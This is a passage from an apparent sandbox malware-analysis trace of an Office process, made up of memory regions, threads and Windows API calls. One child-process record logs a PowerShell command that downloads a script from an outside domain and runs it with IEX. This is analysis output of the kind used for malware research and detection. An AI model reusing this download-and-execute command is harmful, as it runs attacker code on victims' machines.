"private_0x000007fffff5a000" filename = "" Region: id = 596 start_va = 0x7fffff5c000 end_va = 0x7fffff5dfff entry_point = 0x0 region_type = private name = "private_0x000007fffff5c000" filename = "" Region: id = 597 start_va = 0x7fffff5e000 end_va = 0x7fffff5ffff entry_point = 0x0 region_type = private name = "private_0x000007fffff5e000" filename = "" Region: id = 598 start_va = 0x3100000 end_va = 0x3103fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 599 start_va = 0x5660000 end_va = 0x5670fff entry_point = 0x5660000 region_type = mapped_file name = "c_20127.nls" filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls") Region: id 
= 600 start_va = 0x5680000 end_va = 0x5693fff entry_point = 0x0 region_type = private name = "private_0x0000000005680000" filename = "" Region: id = 601 start_va = 0x56a0000 end_va = 0x56bdfff entry_point = 0x0 region_type = private name = "private_0x00000000056a0000" filename = "" Region: id = 602 start_va = 0x56c0000 end_va = 0x56c3fff entry_point = 0x0 region_type = private name = "private_0x00000000056c0000" filename = "" Region: id = 603 start_va = 0x56e0000 end_va = 0x56e2fff entry_point = 0x0 region_type = private name = "private_0x00000000056e0000" filename = "" Region: id = 604 start_va = 0x56f0000 end_va = 0x56f1fff entry_point = 0x0 region_type = private name = "private_0x00000000056f0000" filename = "" Region: id = 605 start_va = 0x57d0000 end_va = 0x57d1fff entry_point = 0x0 region_type = private name = "private_0x00000000057d0000" filename = "" Region: id = 606 start_va = 0x5c40000 end_va = 0x5c40fff entry_point = 0x0 region_type = private name = "private_0x0000000005c40000" filename = "" Region: id = 607 start_va = 0x5c50000 end_va = 0x5c51fff entry_point = 0x0 region_type = private name = "private_0x0000000005c50000" filename = "" Region: id = 608 start_va = 0x87c0000 end_va = 0x87c0fff entry_point = 0x0 region_type = private name = "private_0x00000000087c0000" filename = "" Region: id = 609 start_va = 0x87d0000 end_va = 0x87d1fff entry_point = 0x0 region_type = private name = "private_0x00000000087d0000" filename = "" Region: id = 610 start_va = 0x112b0000 end_va = 0x11642fff entry_point = 0x0 region_type = private name = "private_0x00000000112b0000" filename = "" Region: id = 611 start_va = 0x11650000 end_va = 0x11b2ffff entry_point = 0x0 region_type = private name = "private_0x0000000011650000" filename = "" Region: id = 612 start_va = 0x11b30000 end_va = 0x12afffff entry_point = 0x0 region_type = private name = "private_0x0000000011b30000" filename = "" Region: id = 613 start_va = 0x7fef1c10000 end_va = 0x7fef1c1cfff entry_point = 0x7fef1c10000 
region_type = mapped_file name = "msostyle.dll" filename = "\\Program Files\\Microsoft Office\\Office15\\MSOSTYLE.DLL" (normalized: "c:\\program files\\microsoft office\\office15\\msostyle.dll") Region: id = 629 start_va = 0x2030000 end_va = 0x2044fff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 630 start_va = 0x2050000 end_va = 0x2050fff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 631 start_va = 0x2060000 end_va = 0x207ffff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 632 start_va = 0x2080000 end_va = 0x2080fff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 633 start_va = 0x3090000 end_va = 0x3093fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 634 start_va = 0x30a0000 end_va = 0x30a3fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 635 start_va = 0x30d0000 end_va = 0x30d2fff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 636 start_va = 0x30e0000 end_va = 0x30e1fff entry_point = 0x0 region_type = private name = "private_0x00000000030e0000" filename = "" Region: id = 637 start_va = 0x3100000 end_va = 0x3100fff entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 638 start_va = 0x3110000 end_va = 0x3110fff entry_point = 0x0 region_type = private name = "private_0x0000000003110000" filename = "" Region: id = 639 start_va = 0x74e0000 end_va = 0x755ffff entry_point = 0x0 region_type = private name = "private_0x00000000074e0000" filename = "" Region: id = 640 start_va = 0x75c0000 end_va = 0x763ffff entry_point = 0x0 region_type = private name = "private_0x00000000075c0000" filename = "" Region: id = 641 start_va = 0x7640000 
end_va = 0x7741fff entry_point = 0x0 region_type = private name = "private_0x0000000007640000" filename = "" Region: id = 642 start_va = 0x12b00000 end_va = 0x13acffff entry_point = 0x0 region_type = private name = "private_0x0000000012b00000" filename = "" Region: id = 643 start_va = 0x13ad0000 end_va = 0x14e24fff entry_point = 0x13ad0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 644 start_va = 0x7fef6a30000 end_va = 0x7fef6b4efff entry_point = 0x7fef6a30000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 1959 start_va = 0x2030000 end_va = 0x2049fff entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 1960 start_va = 0x2050000 end_va = 0x2052fff entry_point = 0x0 region_type = private name = "private_0x0000000002050000" filename = "" Region: id = 1961 start_va = 0x2070000 end_va = 0x2072fff entry_point = 0x0 region_type = private name = "private_0x0000000002070000" filename = "" Region: id = 1962 start_va = 0x2080000 end_va = 0x2082fff entry_point = 0x0 region_type = private name = "private_0x0000000002080000" filename = "" Region: id = 1963 start_va = 0x3090000 end_va = 0x3092fff entry_point = 0x0 region_type = private name = "private_0x0000000003090000" filename = "" Region: id = 1964 start_va = 0x30a0000 end_va = 0x30a2fff entry_point = 0x0 region_type = private name = "private_0x00000000030a0000" filename = "" Region: id = 1965 start_va = 0x30d0000 end_va = 0x30dffff entry_point = 0x0 region_type = private name = "private_0x00000000030d0000" filename = "" Region: id = 1966 start_va = 0x3120000 end_va = 0x3120fff entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 1967 start_va = 0x3140000 end_va = 0x3140fff entry_point = 0x0 
region_type = private name = "private_0x0000000003140000" filename = "" Region: id = 1968 start_va = 0x3150000 end_va = 0x3150fff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 1969 start_va = 0x32f0000 end_va = 0x32f0fff entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 1970 start_va = 0x3300000 end_va = 0x3300fff entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 1971 start_va = 0x3330000 end_va = 0x3330fff entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 1972 start_va = 0x3340000 end_va = 0x3340fff entry_point = 0x0 region_type = private name = "private_0x0000000003340000" filename = "" Region: id = 1973 start_va = 0x3fd0000 end_va = 0x3fd0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fd0000" filename = "" Region: id = 1974 start_va = 0x3fe0000 end_va = 0x3fe0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fe0000" filename = "" Region: id = 1975 start_va = 0x3ff0000 end_va = 0x3ff0fff entry_point = 0x0 region_type = private name = "private_0x0000000003ff0000" filename = "" Region: id = 1976 start_va = 0x4000000 end_va = 0x4000fff entry_point = 0x0 region_type = private name = "private_0x0000000004000000" filename = "" Region: id = 1977 start_va = 0x4010000 end_va = 0x4010fff entry_point = 0x0 region_type = private name = "private_0x0000000004010000" filename = "" Region: id = 1978 start_va = 0x4020000 end_va = 0x4020fff entry_point = 0x0 region_type = private name = "private_0x0000000004020000" filename = "" Region: id = 1979 start_va = 0x5680000 end_va = 0x5680fff entry_point = 0x0 region_type = private name = "private_0x0000000005680000" filename = "" Region: id = 1980 start_va = 0x110d0000 end_va = 0x111cffff entry_point = 0x0 region_type = private name = "private_0x00000000110d0000" filename = "" 
Region: id = 1981 start_va = 0x11780000 end_va = 0x117fffff entry_point = 0x0 region_type = private name = "private_0x0000000011780000" filename = "" Region: id = 1982 start_va = 0x7fef7720000 end_va = 0x7fef77e5fff entry_point = 0x7fef7720000 region_type = mapped_file name = "msftedit.dll" filename = "\\Windows\\System32\\msftedit.dll" (normalized: "c:\\windows\\system32\\msftedit.dll") Region: id = 1983 start_va = 0x3f70000 end_va = 0x3f70fff entry_point = 0x3f70000 region_type = mapped_file name = "thumbcache_1024.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_1024.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_1024.db") Region: id = 1984 start_va = 0x3f80000 end_va = 0x3f80fff entry_point = 0x3f80000 region_type = mapped_file name = "thumbcache_sr.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_sr.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_sr.db") Region: id = 1985 start_va = 0x3f90000 end_va = 0x3f90fff entry_point = 0x3f90000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1986 start_va = 0x3fb0000 end_va = 0x3fb0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fb0000" filename = "" Region: id = 1987 start_va = 0x4030000 end_va = 0x4030fff entry_point = 0x0 region_type = private name = "private_0x0000000004030000" filename = "" Region: id = 1988 start_va = 0x4040000 end_va = 0x4040fff entry_point = 0x0 region_type = private name = "private_0x0000000004040000" filename = "" Region: id = 1989 start_va = 0x7750000 end_va = 0x784ffff entry_point = 0x7750000 region_type = mapped_file name = 
"thumbcache_96.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db") Region: id = 1990 start_va = 0x10850000 end_va = 0x1094ffff entry_point = 0x10850000 region_type = mapped_file name = "thumbcache_256.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db") Region: id = 1991 start_va = 0x10e10000 end_va = 0x10f0ffff entry_point = 0x10e10000 region_type = mapped_file name = "thumbcache_32.db" filename = "\\Users\\aDU0VK IWA5kLS\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db" (normalized: "c:\\users\\adu0vk iwa5kls\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db") Region: id = 1992 start_va = 0x7fefb6f0000 end_va = 0x7fefb703fff entry_point = 0x7fefb6f0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1993 start_va = 0x7fefc580000 end_va = 0x7fefc59cfff entry_point = 0x7fefc580000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 1994 start_va = 0x2060000 end_va = 0x2060fff entry_point = 0x0 region_type = private name = "private_0x0000000002060000" filename = "" Region: id = 1995 start_va = 0x3fa0000 end_va = 0x3fa4fff entry_point = 0x3fa0000 region_type = mapped_file name = "oleaccrc.dll.mui" filename = "\\Windows\\System32\\en-US\\oleaccrc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\oleaccrc.dll.mui") Region: id = 1996 start_va = 0x3fc0000 end_va = 0x3fc0fff entry_point = 0x0 region_type = private name = "private_0x0000000003fc0000" filename = "" Region: id = 1997 start_va = 0x4050000 end_va = 0x4051fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004050000" filename = "" Region: id = 1998 start_va = 0x70f40000 end_va = 0x72295fff entry_point = 0x70f40000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1999 start_va = 0x7fee8e00000 end_va = 0x7fee9070fff entry_point = 0x7fee8e00000 region_type = mapped_file name = "wpdshext.dll" filename = "\\Windows\\System32\\wpdshext.dll" (normalized: "c:\\windows\\system32\\wpdshext.dll") Region: id = 2000 start_va = 0x7fef80e0000 end_va = 0x7fef8114fff entry_point = 0x7fef80e0000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 2001 start_va = 0x2050000 end_va = 0x2051fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002050000" filename = "" Region: id = 2002 start_va = 0xa460000 end_va = 0xa55ffff entry_point = 0x0 region_type = private name = "private_0x000000000a460000" filename = "" Region: id = 2003 start_va = 0x7fefbc70000 end_va = 0x7fefbc9bfff entry_point = 0x7fefbc70000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Thread: id = 1 os_tid = 0xa8c Thread: id = 2 os_tid = 0xa88 Thread: id = 3 os_tid = 0xa84 Thread: id = 4 os_tid = 0xa80 Thread: id = 5 os_tid = 0xa7c Thread: id = 6 os_tid = 0xa78 Thread: id = 7 os_tid = 0xa74 Thread: id = 8 os_tid = 0xa70 Thread: id = 9 os_tid = 0xa6c Thread: id = 10 os_tid = 0xa68 Thread: id = 11 os_tid = 0xa1c Thread: id = 12 os_tid = 0xa14 Thread: id = 13 os_tid = 0x9f0 Thread: id = 14 os_tid = 0x9d0 Thread: id = 15 os_tid = 0x9cc Thread: id = 16 os_tid = 0x9c8 Thread: id = 17 os_tid = 0x9c4 Thread: id = 18 os_tid = 0x9c0 Thread: id = 19 os_tid = 0x9bc Thread: id = 20 os_tid = 0x9b8 Thread: id = 21 
os_tid = 0x9b4 Thread: id = 22 os_tid = 0x9b0 [0125.416] MsoSetLVProperty () returned 0x1 [0125.428] MsoSetLVProperty () returned 0x1 [0125.428] MsoSetLVProperty () returned 0x1d4406b27b9b5c1 [0125.428] GetLocalTime (in: lpSystemTime=0x1cf030 | out: lpSystemTime=0x1cf030*(wYear=0x7e2, wMonth=0x8, wDayOfWeek=0x4, wDay=0x1e, wHour=0x13, wMinute=0xa, wSecond=0x3, wMilliseconds=0x6c)) [0125.428] MsoSetLVProperty () returned 0x1 Thread: id = 23 os_tid = 0xa90 Thread: id = 24 os_tid = 0xa94 Thread: id = 25 os_tid = 0xa98 Thread: id = 26 os_tid = 0xa9c Thread: id = 27 os_tid = 0xaa0 Thread: id = 28 os_tid = 0xaa4 Thread: id = 29 os_tid = 0xab4 Thread: id = 30 os_tid = 0xab8 Thread: id = 31 os_tid = 0xaf0 Thread: id = 32 os_tid = 0xaf4 Thread: id = 33 os_tid = 0xb40 Thread: id = 34 os_tid = 0xb44 Thread: id = 35 os_tid = 0xb48 Thread: id = 36 os_tid = 0xb4c Thread: id = 37 os_tid = 0xb50 Thread: id = 38 os_tid = 0xb54 Thread: id = 39 os_tid = 0xba8 Thread: id = 40 os_tid = 0xbac Thread: id = 41 os_tid = 0xbb0 Thread: id = 66 os_tid = 0x6cc Thread: id = 67 os_tid = 0x71c Thread: id = 68 os_tid = 0x2e0 Thread: id = 69 os_tid = 0x574 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x6f5bf000" os_pid = "0xbe0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9ac" cmd_line = "CMD.EXE /c C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -sta -nologo -nop -c IEX ((new-object net.webclient).downloadstring(\\\"http://ms365box.com/update.2\\\"))" cur_dir = "C:\\Users\\aDU0VK IWA5kLS\\Desktop\\" os_username = "AUFDDCNTXWT\\aDU0VK IWA5kLS" os_groups = "AUFDDCNTXWT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:000117e7" 
[0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 614 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 615 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 616 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 617 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 618 start_va = 0x4a030000 end_va = 0x4a088fff entry_point = 0x4a030000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 619 start_va = 0x77b50000 end_va = 0x77cf8fff entry_point = 0x77b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 620 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 621 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 622 start_va = 0x7feffe70000 end_va = 0x7feffe70fff entry_point = 0x7feffe70000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 623 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 624 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 625 start_va = 
0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 626 start_va = 0x2b0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 627 start_va = 0x77930000 end_va = 0x77a4efff entry_point = 0x77930000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 628 start_va = 0x7fefdd20000 end_va = 0x7fefdd8afff entry_point = 0x7fefdd20000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 645 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 646 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 647 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 648 start_va = 0x77a50000 end_va = 0x77b49fff entry_point = 0x77a50000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 649 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 650 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 651 start_va = 0x7fee9e10000 end_va = 0x7fee9e17fff entry_point = 0x7fee9e10000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" 
(normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 652 start_va = 0x7fefde70000 end_va = 0x7fefde7dfff entry_point = 0x7fefde70000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 653 start_va = 0x7fefde80000 end_va = 0x7fefdf1efff entry_point = 0x7fefde80000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 654 start_va = 0x7fefe210000 end_va = 0x7fefe276fff entry_point = 0x7fefe210000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 655 start_va = 0x7feffd70000 end_va = 0x7feffe38fff entry_point = 0x7feffd70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 656 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 657 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 658 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 659 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 660 start_va = 0x3b0000 end_va = 0x4affff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 661 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 662 start_va = 0x580000 end_va = 0x707fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" 
filename = "" Region: id = 663 start_va = 0x710000 end_va = 0x890fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 664 start_va = 0x8a0000 end_va = 0x1c9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 665 start_va = 0x1ca0000 end_va = 0x1fe2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ca0000" filename = "" Region: id = 666 start_va = 0x7fefe1e0000 end_va = 0x7fefe20dfff entry_point = 0x7fefe1e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 667 start_va = 0x7fefe300000 end_va = 0x7fefe408fff entry_point = 0x7fefe300000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 668 start_va = 0x1ff0000 end_va = 0x22befff entry_point = 0x1ff0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 42 os_tid = 0xbe4 [0125.495] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f9b0 | out: lpSystemTimeAsFileTime=0x18f9b0*(dwLowDateTime=0x562ae410, dwHighDateTime=0x1d4406f)) [0125.495] GetCurrentProcessId () returned 0xbe0 [0125.495] GetCurrentThreadId () returned 0xbe4 [0125.495] GetTickCount () returned 0x2b9fb [0125.495] QueryPerformanceCounter (in: lpPerformanceCount=0x18f9b8 | out: lpPerformanceCount=0x18f9b8*=24371057039) returned 1 [0125.497] GetModuleHandleW (lpModuleName=0x0) returned 0x4a030000 [0125.497] __set_app_type (_Type=0x1) [0125.497] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a057810) returned 0x0 [0125.497] __getmainargs (in: _Argc=0x4a07a608, _Argv=0x4a07a618, _Env=0x4a07a610, _DoWildCard=0, _StartInfo=0x4a05e0f4 | out: 
_Argc=0x4a07a608, _Argv=0x4a07a618, _Env=0x4a07a610) returned 0 [0125.498] GetCurrentThreadId () returned 0xbe4 [0125.498] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xbe4) returned 0x3c [0125.498] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77930000 [0125.498] GetProcAddress (hModule=0x77930000, lpProcName="SetThreadUILanguage") returned 0x77946d40 [0125.498] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0125.498] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0125.498] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x18f948 | out: phkResult=0x18f948*=0x0) returned 0x2 [0125.499] VirtualQuery (in: lpAddress=0x18f930, lpBuffer=0x18f8b0, dwLength=0x30 | out: lpBuffer=0x18f8b0*(BaseAddress=0x18f000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.499] VirtualQuery (in: lpAddress=0x90000, lpBuffer=0x18f8b0, dwLength=0x30 | out: lpBuffer=0x18f8b0*(BaseAddress=0x90000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.499] VirtualQuery (in: lpAddress=0x91000, lpBuffer=0x18f8b0, dwLength=0x30 | out: lpBuffer=0x18f8b0*(BaseAddress=0x91000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.499] VirtualQuery (in: lpAddress=0x94000, lpBuffer=0x18f8b0, dwLength=0x30 | out: lpBuffer=0x18f8b0*(BaseAddress=0x94000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0125.499] VirtualQuery (in: lpAddress=0x190000, 
lpBuffer=0x18f8b0, dwLength=0x30 | out: lpBuffer=0x18f8b0*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30 [0125.499] GetConsoleOutputCP () returned 0x1b5 [0125.499] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a06bfe0 | out: lpCPInfo=0x4a06bfe0) returned 1 [0125.499] SetConsoleCtrlHandler (HandlerRoutine=0x4a053184, Add=1) returned 1 [0125.499] _get_osfhandle (_FileHandle=1) returned 0x7 [0125.499] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0125.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0125.500] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a05e194 | out: lpMode=0x4a05e194) returned 1 [0125.500] _get_osfhandle (_FileHandle=1) returned 0x7 [0125.500] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0125.501] _get_osfhandle (_FileHandle=0) returned 0x3 [0125.501] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a05e198 | out: lpMode=0x4a05e198) returned 1 [0125.501] _get_osfhandle (_FileHandle=0) returned 0x3 [0125.501] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0125.501] GetEnvironmentStringsW () returned 0x2c8c50* [0125.501] FreeEnvironmentStringsW (penv=0x2c8c50) returned 1 [0125.502] GetEnvironmentStringsW () returned 0x2c8c50* [0125.502] FreeEnvironmentStringsW (penv=0x2c8c50) returned 1 [0125.502] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x18e808 | out: phkResult=0x18e808*=0x44) returned 0x0 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, lpcbData=0x18e804*=0x1000 | out: lpType=0x18e800*=0x0, lpData=0x18e820*=0x18, lpcbData=0x18e804*=0x1000) returned 0x2 [0125.503] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x18e800, lpData=0x18e820, 
